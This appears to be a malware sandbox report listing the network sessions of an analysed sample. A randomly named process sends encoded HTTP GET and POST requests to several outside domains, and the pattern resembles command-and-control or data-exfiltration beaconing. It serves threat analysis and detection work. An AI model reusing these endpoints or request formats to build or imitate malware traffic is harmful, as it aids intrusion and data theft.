bFGXGTdX=bqdx0HHuHERDr+e64vRDJftVNF0bslBYIj9zGbihPbqg1J8X6sXr5mNIuTGRh1dCTHmt1dwQt9B8haJeFMD97OYKfPHjfZXyslh2wQCYvCxNf4kmpclrAUjcJ14/FV/faqp91Ba5Z8TLEru8tPmIltzCMRFbKOcYtb4JwRKRWAuetxitahK30xSlB+oYhkgoVIvvv9J+FkS0LR60IVDVxKCUQ1HBkURkai6dzLxEwjm4WDTD2yVfiLMBOeVNy3/tStirQSgOBm1EqP9w1MRoFWLw89YksW+m05kmprjZPa2XTCV5Jyxsbo+TEvhxAu4inIblz7xRLe5SW445VgVM6aZtmaeCj6T+9EHoo3mIwIqnyOrfCrtXQTtPor4WNZ6H4nYmAuFk9YJHsC+GMZNC+Piq0dN04gHFKvzN6au9UxiOOuE0nQ27pMUOVVA0fxBHgxU0c4H+PAJsx/RCNLN2V3srdj58k1j0pM1qR0+8zr1fkVJBL1vGF2On8FlwpvGiUFLbk/ushzOV8FDh8hjQAZnBisOrabBnMDcbpnIvQwZ0uOfxixQMH5en8bKQR+8ila8bCHlKfbe+JAD8vlBKuosEO/YPZK+yDppzvJNUMTmNnP3/c2FW6B77OHt8v+Gz+UQmunuRczCiF+d+MQ3QcdTenFZvwp6TtriHGOhDORzd6WS/nzDAgRnZZLLYPh+m//ieblUmAKJ2CE+II3EQBVeuOKqumLUIv1V1N26gP16HNz3aq968eCBTIMHH+Fdsv8c3Bod6exjllPfXOS0jJtBpeigYmiYQI79tXD2cG2lkyPP0Ennu9kl4mwSIx3e3t1V98rOVVqmrkiEYNBSi9KyQ24lSRvKRi7vSa7i4OGR/F1vqiCKR6CvvmlyD3wNsRRb9CzdegjATPSaiZoLE01nEQsIFHkCQfHhkiFfd4eqpPIDyeo3FYo3yVXCUq15uK53eYIQg/AbKX0fRRqv2xA63eLmHe/HCDx3tS2C2tTM [TRUNCATED]
                                                          Sep 11, 2024 22:05:24.030232906 CEST208INHTTP/1.1 403 Forbidden
                                                          content-length: 93
                                                          cache-control: no-cache
                                                          content-type: text/html
                                                          connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          36192.168.2.104974491.195.240.19804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:05:25.921297073 CEST467OUTGET /rlev/?bFGXGTdX=Wo1R3wm8Ej8entDC+cV4KaEDP0IDvxtNKgFdfJiYIIGalaQSkKKZ1Xkt0Su2x108KR/fnP4QiNVkos1WTd/84fgdAaOORrOEsxtw8yTuzQl5BJwg/A==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.purpleheartlacey.com
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Sep 11, 2024 22:05:26.772846937 CEST208INHTTP/1.1 403 Forbidden
                                                          content-length: 93
                                                          cache-control: no-cache
                                                          content-type: text/html
                                                          connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          37192.168.2.104974531.186.11.254804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:05:40.290369987 CEST728OUTPOST /pt32/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.grafiktema.xyz
                                                          Origin: http://www.grafiktema.xyz
                                                          Content-Length: 197
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.grafiktema.xyz/pt32/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 2f 31 4f 53 54 36 53 4d 41 4f 30 50 37 56 35 34 67 70 75 64 51 42 6d 41 2f 55 6d 30 58 6a 34 34 6d 37 6f 4c 63 79 4d 49 45 30 49 75 4e 61 66 4a 4d 51 4b 4f 49 6f 59 57 4a 73 4f 74 75 48 57 4d 64 4e 4d 65 35 43 46 63 6f 74 49 68 39 55 32 49 35 4f 70 6b 55 2f 31 6a 65 4c 4f 34 76 32 38 2f 31 50 71 73 65 52 62 79 4b 6c 71 6a 56 6a 73 52 48 4d 75 45 64 72 4c 49 43 4f 55 4c 30 76 30 35 6c 31 49 75 30 31 59 4b 47 33 74 71 7a 79 4a 43 68 6f 45 59 69 45 32 4b 4d 53 4a 53 6a 49 66 7a 77 52 6d 53 63 4f 6b 57 69 33 58 33 2f 63 69 4e 64 67 38 30 50 54 52 37 50 6e 36 4c
                                                          Data Ascii: bFGXGTdX=/1OST6SMAO0P7V54gpudQBmA/Um0Xj44m7oLcyMIE0IuNafJMQKOIoYWJsOtuHWMdNMe5CFcotIh9U2I5OpkU/1jeLO4v28/1PqseRbyKlqjVjsRHMuEdrLICOUL0v05l1Iu01YKG3tqzyJChoEYiE2KMSJSjIfzwRmScOkWi3X3/ciNdg80PTR7Pn6L


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          38192.168.2.104974631.186.11.254804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:05:43.470554113 CEST752OUTPOST /pt32/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.grafiktema.xyz
                                                          Origin: http://www.grafiktema.xyz
                                                          Content-Length: 221
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.grafiktema.xyz/pt32/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 2f 31 4f 53 54 36 53 4d 41 4f 30 50 39 30 4a 34 6a 4f 53 64 59 42 6d 48 38 55 6d 30 41 7a 34 38 6d 37 6b 4c 63 32 30 59 52 57 38 75 4f 37 76 4a 4e 53 69 4f 46 49 59 57 52 63 4f 73 67 6e 57 48 64 4e 41 57 35 43 4a 63 6f 70 59 68 39 51 79 49 35 2f 70 6a 47 66 31 68 4c 62 4f 2b 77 47 38 2f 31 50 71 73 65 51 72 49 4b 6c 69 6a 56 53 63 52 45 74 75 4c 56 4c 4c 4c 55 65 55 4c 2b 2f 30 39 6c 31 4a 42 30 30 56 66 47 78 68 71 7a 79 35 43 68 35 45 62 37 30 33 42 52 69 49 6c 6c 71 4b 65 32 6b 43 50 63 39 73 4e 34 47 72 57 78 64 44 4b 4d 78 64 6a 63 6b 4e 31 42 68 50 68 74 79 4d 6e 2b 2b 42 45 6b 50 59 46 42 6d 46 67 58 79 5a 49 45 77 3d 3d
                                                          Data Ascii: bFGXGTdX=/1OST6SMAO0P90J4jOSdYBmH8Um0Az48m7kLc20YRW8uO7vJNSiOFIYWRcOsgnWHdNAW5CJcopYh9QyI5/pjGf1hLbO+wG8/1PqseQrIKlijVScREtuLVLLLUeUL+/09l1JB00VfGxhqzy5Ch5Eb703BRiIllqKe2kCPc9sN4GrWxdDKMxdjckN1BhPhtyMn++BEkPYFBmFgXyZIEw==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          39192.168.2.104974731.186.11.254804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:05:45.997519970 CEST1765OUTPOST /pt32/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.grafiktema.xyz
                                                          Origin: http://www.grafiktema.xyz
                                                          Content-Length: 1233
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.grafiktema.xyz/pt32/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 2f 31 4f 53 54 36 53 4d 41 4f 30 50 39 30 4a 34 6a 4f 53 64 59 42 6d 48 38 55 6d 30 41 7a 34 38 6d 37 6b 4c 63 32 30 59 52 57 45 75 4e 4a 6e 4a 4d 7a 69 4f 45 49 59 57 50 73 4f 68 67 6e 57 61 64 4d 6f 53 35 43 55 70 6f 76 45 68 2b 7a 36 49 78 72 39 6a 66 76 31 68 4a 62 4f 37 76 32 38 51 31 50 36 67 65 51 62 49 4b 6c 69 6a 56 52 30 52 51 73 75 4c 54 4c 4c 49 43 4f 55 50 30 76 30 46 6c 31 52 37 30 30 51 6b 47 42 42 71 7a 53 70 43 69 4c 38 62 6b 45 33 44 53 69 49 39 6c 71 57 64 32 6b 32 70 63 2b 78 59 34 46 37 57 7a 37 65 65 65 42 56 59 4a 79 5a 75 4a 43 7a 6a 6d 31 73 6a 67 71 73 42 79 72 30 6e 53 33 4a 31 61 53 31 43 5a 37 4f 6c 31 32 79 37 4e 5a 30 43 31 63 48 34 50 6c 6b 2f 44 63 73 4b 4b 63 38 76 6a 4a 65 77 4d 32 7a 67 71 6e 44 79 6c 46 30 59 41 68 51 50 4e 7a 4a 39 6f 6c 4a 64 51 66 4b 6f 59 78 4e 36 6b 52 35 4d 78 4b 4f 72 48 71 64 2f 62 31 35 53 58 30 49 5a 62 75 42 30 7a 43 2b 66 37 6c 6d 52 4b 68 4a 52 43 45 4d 48 55 56 2b 34 70 59 39 4b 6d 6a 4f 62 44 78 33 54 59 [TRUNCATED]
                                                          Data Ascii: bFGXGTdX=/1OST6SMAO0P90J4jOSdYBmH8Um0Az48m7kLc20YRWEuNJnJMziOEIYWPsOhgnWadMoS5CUpovEh+z6Ixr9jfv1hJbO7v28Q1P6geQbIKlijVR0RQsuLTLLICOUP0v0Fl1R700QkGBBqzSpCiL8bkE3DSiI9lqWd2k2pc+xY4F7Wz7eeeBVYJyZuJCzjm1sjgqsByr0nS3J1aS1CZ7Ol12y7NZ0C1cH4Plk/DcsKKc8vjJewM2zgqnDylF0YAhQPNzJ9olJdQfKoYxN6kR5MxKOrHqd/b15SX0IZbuB0zC+f7lmRKhJRCEMHUV+4pY9KmjObDx3TYrVbvD+3k1IBNDCyRbfi4P/hn+E/acZKXjzfXdBVX9UhUoVk32sKZNgrR410W1ZtV2l5LHsSm/ZU3AM1CCWQC5zD1BEzhD+EwvTrIq+8rWVkuL0WdKUt7mojKBMCcNISL7YCYvX6jjGQbHEnOsQf2GvGoKynFXKETFP4eY85zzPlggt8wi8bsB2msLObK34EKNNh5dl6FeGMse7SU24Z0E+4B0dd4hLcmgGqvhPhxk4pgLbRWE3k+ZOXStT7Sp15IMLKrX5Thg9zfYRNawtNYGO5GS+qEu27gMC+tBMQOGuEPREcP5iIeg64gnjN5lK4aE9ScDhLW9ZjMnTpll14mEY2TBcFnBFWJUlfHZ2p6JeXJ6P05Q5XhSmpFGYS6FpjD1RzdnlP9CC+iR+SWwQD8gB5wPoOb13kwpoS3P8JOOlZDH4NavkR0M/NUK6NwEuQOCBNMuMpZjNaMoOwmFDjYdIgMowqXCATJF2a67lSn2sKuIeBYU3oOz0xJ+7D2fbWl8c01n4u58GFsXyhFL2+vbf5dpYEhZi9gwOxnuVl5fJALCZSzandgVWZbHYdjBkQWWJ72SjqE97leSpEOXl1/dtV6C+AI7/VqlVR1DrSmyi8C+3iNtVo47ctDejwq6EgWGEPglD6K5zaPHYaJiadgCbF4WBZNhZsv6F [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          40192.168.2.104974831.186.11.254804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:05:48.539350033 CEST461OUTGET /pt32/?bFGXGTdX=y3myQPKMG7UG4U86kYjDSgzezXSmAkUzi6cKVm8KTXszLa2xdxq+NpYfRMeTkluAfKxM8yJJ9pAbryr3svtYXqMrD5rBnUtNlc/QUHCATHSaLBoyFg==&M87d=RDddFbF8 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-us
                                                          Host: www.grafiktema.xyz
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          41192.168.2.1049749192.250.231.28804832C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:06:15.009797096 CEST716OUTPOST /o1v8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.cr-pos.com
                                                          Origin: http://www.cr-pos.com
                                                          Content-Length: 197
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.cr-pos.com/o1v8/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 34 67 53 53 41 47 6d 38 73 71 7a 61 34 54 77 34 78 45 67 65 77 6a 74 52 4b 45 4b 31 6e 79 30 2b 58 43 72 7a 36 38 36 75 48 38 67 4e 36 68 6c 79 6f 49 6a 35 48 64 58 36 4f 70 59 35 42 78 69 45 31 70 6f 74 58 57 63 4e 57 6b 69 45 47 52 46 65 49 4b 59 4d 38 71 5a 46 41 2f 55 4c 38 53 64 42 45 73 7a 73 48 75 72 47 54 76 6b 49 2f 44 7a 6f 32 55 6d 35 69 53 32 78 75 69 4a 61 30 4a 7a 33 37 71 44 57 63 64 49 44 4a 57 70 58 65 37 34 69 63 2b 77 39 33 7a 51 6d 6b 57 71 4c 49 4b 7a 64 65 70 48 76 38 54 65 43 62 35 34 6a 67 47 53 79 49 4b 71 6c 65 31 72 59 73 4a 76 69
                                                          Data Ascii: bFGXGTdX=4gSSAGm8sqza4Tw4xEgewjtRKEK1ny0+XCrz686uH8gN6hlyoIj5HdX6OpY5BxiE1potXWcNWkiEGRFeIKYM8qZFA/UL8SdBEszsHurGTvkI/Dzo2Um5iS2xuiJa0Jz37qDWcdIDJWpXe74ic+w93zQmkWqLIKzdepHv8TeCb54jgGSyIKqle1rYsJvi
                                                          Sep 11, 2024 22:06:15.495182037 CEST1236INHTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Server: Microsoft-IIS/10.0
                                                          X-Powered-By: ASP.NET
                                                          X-Powered-By-Plesk: PleskWin
                                                          Date: Wed, 11 Sep 2024 20:06:15 GMT
                                                          Connection: close
                                                          Content-Length: 1245
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                          Sep 11, 2024 22:06:15.495198965 CEST219INData Raw: 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69
                                                          Data Ascii: > <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          42192.168.2.1049750192.250.231.2880
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:06:18.137933016 CEST740OUTPOST /o1v8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.cr-pos.com
                                                          Origin: http://www.cr-pos.com
                                                          Content-Length: 221
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.cr-pos.com/o1v8/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 34 67 53 53 41 47 6d 38 73 71 7a 61 35 7a 41 34 30 6c 67 65 6e 7a 74 53 46 6b 4b 31 73 53 30 36 58 43 6e 7a 36 2f 32 2b 45 50 45 4e 36 44 39 79 70 4a 6a 35 4f 4e 58 36 47 4a 59 67 46 78 69 50 31 70 56 51 58 54 30 4e 57 67 79 45 47 55 70 65 49 39 73 50 2f 61 5a 48 59 50 55 46 6b 79 64 42 45 73 7a 73 48 75 2f 6f 54 76 63 49 2f 7a 6a 6f 33 77 79 36 35 79 32 32 35 53 4a 61 2b 70 7a 7a 37 71 44 77 63 66 38 6c 4a 54 74 58 65 2f 30 69 63 73 49 2b 38 7a 51 6b 35 47 72 54 5a 72 75 34 57 37 6e 4c 6c 77 50 49 47 34 6b 42 71 48 7a 31 5a 62 4c 79 4e 43 33 57 69 50 61 49 57 2f 6e 78 4c 57 7a 64 6b 4a 54 41 63 77 59 71 34 35 51 42 45 67 3d 3d
                                                          Data Ascii: bFGXGTdX=4gSSAGm8sqza5zA40lgenztSFkK1sS06XCnz6/2+EPEN6D9ypJj5ONX6GJYgFxiP1pVQXT0NWgyEGUpeI9sP/aZHYPUFkydBEszsHu/oTvcI/zjo3wy65y225SJa+pzz7qDwcf8lJTtXe/0icsI+8zQk5GrTZru4W7nLlwPIG4kBqHz1ZbLyNC3WiPaIW/nxLWzdkJTAcwYq45QBEg==
                                                          Sep 11, 2024 22:06:18.792932034 CEST1236INHTTP/1.1 404 Not Found
                                                          Content-Type: text/html
                                                          Server: Microsoft-IIS/10.0
                                                          X-Powered-By: ASP.NET
                                                          X-Powered-By-Plesk: PleskWin
                                                          Date: Wed, 11 Sep 2024 20:06:18 GMT
                                                          Connection: close
                                                          Content-Length: 1245
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
                                                          Sep 11, 2024 22:06:18.792953014 CEST219INData Raw: 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69
                                                          Data Ascii: > <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          43192.168.2.1049751192.250.231.2880
                                                          TimestampBytes transferredDirectionData
                                                          Sep 11, 2024 22:06:20.669379950 CEST1753OUTPOST /o1v8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Host: www.cr-pos.com
                                                          Origin: http://www.cr-pos.com
                                                          Content-Length: 1233
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Cache-Control: max-age=0
                                                          Referer: http://www.cr-pos.com/o1v8/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                          Data Raw: 62 46 47 58 47 54 64 58 3d 34 67 53 53 41 47 6d 38 73 71 7a 61 35 7a 41 34 30 6c 67 65 6e 7a 74 53 46 6b 4b 31 73 53 30 36 58 43 6e 7a 36 2f 32 2b 45 50 4d 4e 37 77 31 79 6f 71 62 35 63 64 58 36 46 4a 59 39 46 78 69 65 31 74 35 55 58 54 78 34 57 6d 75 45 47 79 39 65 44 76 45 50 6f 71 5a 48 52 76 55 49 38 53 64 59 45 6f 66 6f 48 75 76 6f 54 76 63 49 2f 78 4c 6f 78 6b 6d 36 37 79 32 78 75 69 4a 57 30 4a 79 57 37 71 71 46 63 66 6f 31 4a 48 5a 58 48 62 59 69 65 66 77 2b 6a 44 51 69 36 47 72 41 5a 72 69 72 57 37 72 48 6c 78 4b 6a 47 2f 67 42 6e 44 53 33 64 59 6a 31 52 54 36 4d 75 76 4b 53 52 62 2b 55 4c 57 50 56 67 62 44 6b 63 79 52 34 79 61 42 4c 52 6d 47 54 78 4e 67 56 52 37 58 6a 45 44 59 48 58 56 30 61 2f 4c 47 32 63 79 37 44 4a 64 72 66 38 6c 35 63 76 6e 31 63 50 77 72 45 61 34 5a 54 4d 4c 71 4f 33 5a 35 74 59 72 79 43 58 38 57 4a 2f 46 68 42 51 4c 79 47 47 2b 37 48 71 73 63 68 35 33 6a 69 54 50 4b 52 32 39 67 50 2b 50 4d 48 39 51 68 54 67 5a 78 68 43 43 74 56 37 71 7a 41 54 67 42 78 68 38 66 54 69 [TRUNCATED]
